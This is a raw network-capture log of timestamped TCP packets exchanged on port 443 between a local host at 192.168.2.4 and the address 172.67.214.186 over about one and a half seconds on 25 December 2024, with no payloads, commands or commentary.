                                                                                                                                          Dec 25, 2024 22:17:37.262892962 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.262968063 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.262975931 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.263050079 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.429353952 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.429372072 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.429425001 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.429436922 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.429470062 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.429471016 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.433065891 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.433080912 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.433146000 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.433154106 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.433373928 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.436454058 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.436470032 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.436527967 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.436534882 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.436563015 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.436669111 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.440618992 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.440634966 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.440754890 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.440754890 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.440762997 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.440902948 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.444202900 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.444217920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.444272041 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.444278955 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.444319010 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.444355965 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.448041916 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.448056936 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.448162079 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.448169947 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.448215961 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.451483965 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.451498985 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.451577902 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.451586008 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.451647043 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.455554008 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.455569029 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.455646038 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.455652952 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.455703974 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.621777058 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.621795893 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.621912956 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.621922970 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.621980906 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.625212908 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.625230074 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.625312090 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.625319004 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.625371933 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.628679037 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.628695011 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.628787041 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.628793955 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.628906965 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.632870913 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.632885933 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.632967949 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.632978916 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.633040905 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.636272907 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.636287928 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.636509895 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.636517048 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.636589050 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.640321970 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.640341043 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.640450001 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.640450001 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.640456915 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.642534018 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.643656969 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.643671989 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.643757105 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.643764019 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.643815041 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.647942066 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.647960901 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.648014069 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.648020029 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.648066044 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.648066044 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.815985918 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.816014051 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.816170931 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.816171885 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.816207886 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.816504955 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.819108963 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.819124937 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.819192886 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.819202900 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.819216967 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.822299957 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.822411060 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.822428942 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.822467089 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.822474957 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.822523117 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.822523117 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.826771021 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.826785088 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.826883078 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.826893091 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.826950073 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.829943895 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.829957962 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.830020905 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.830029964 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.830135107 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.832324028 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.832339048 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.832449913 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.832458973 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.832531929 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.839070082 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.839087963 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.839176893 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.839186907 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.839335918 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.842295885 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.842312098 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.842426062 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:37.842434883 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:37.842473030 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.006628990 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.006644011 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.006714106 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.006731033 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.006808996 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.010219097 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.010234118 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.010304928 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.010313988 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.010410070 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.013706923 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.013722897 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.013797045 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.013804913 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.013851881 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.017874956 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.017889023 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.017961979 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.017971039 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.018023968 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.021333933 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.021353006 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.021430016 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.021439075 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.021507025 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.025376081 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.025392056 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.025477886 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.025486946 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.025552988 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.028649092 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.028666019 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.028769970 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.028779030 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.028856039 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.029511929 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.029573917 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.033719063 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.033735037 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.033803940 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.033813000 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.033972979 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.199022055 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.199038029 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.199162006 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.199182987 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.199255943 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.199800968 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.199955940 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.203212023 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.203226089 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.203269958 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.203280926 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.203303099 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.203326941 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.207351923 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.207365036 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.207444906 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.207453966 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.207561016 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.210818052 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.210833073 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.210886955 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.210896015 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.210993052 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.213403940 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.213442087 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.213464975 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.213473082 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.213500977 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.217339993 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.217356920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.217442036 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.217453003 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.221477985 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.221493959 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.221584082 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.221595049 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.224945068 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.224958897 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.225074053 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.225084066 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.271889925 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.391453981 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.391469002 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.391557932 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.391557932 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.391572952 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.391705990 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.395235062 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.395250082 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.395289898 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.395298958 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.395339012 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.395339012 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.398619890 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.398634911 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.398711920 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.398711920 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.398721933 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.398765087 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.402810097 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.402825117 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.402883053 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.402909040 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.402916908 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.403032064 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.406250000 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.406264067 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.406339884 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.406348944 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.406507015 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.410449028 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.410484076 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.410608053 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.410618067 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.410669088 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.414412975 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.414427996 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.414522886 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.414530993 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.414576054 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.417866945 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.417881012 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.417946100 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.417954922 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.418061972 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.583921909 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.583940029 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.584007025 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.584039927 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.584055901 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.584256887 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.587374926 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.587388039 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.587467909 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.587467909 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.587480068 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.587693930 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.591542959 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.591559887 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.591625929 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.591634989 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.591681957 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.595025063 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.595043898 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.595115900 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.595115900 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.595124960 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.595185041 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.599193096 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.599206924 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.599276066 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.599283934 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.599325895 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.602639914 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.602653027 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.602704048 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.602711916 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.602826118 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.606523037 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.606538057 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.606602907 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.606611013 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.606653929 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.610282898 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.610301018 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.610354900 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.610364914 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.610402107 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.610402107 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:38.776393890 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:38.776408911 CET44349744172.67.214.186192.168.2.4
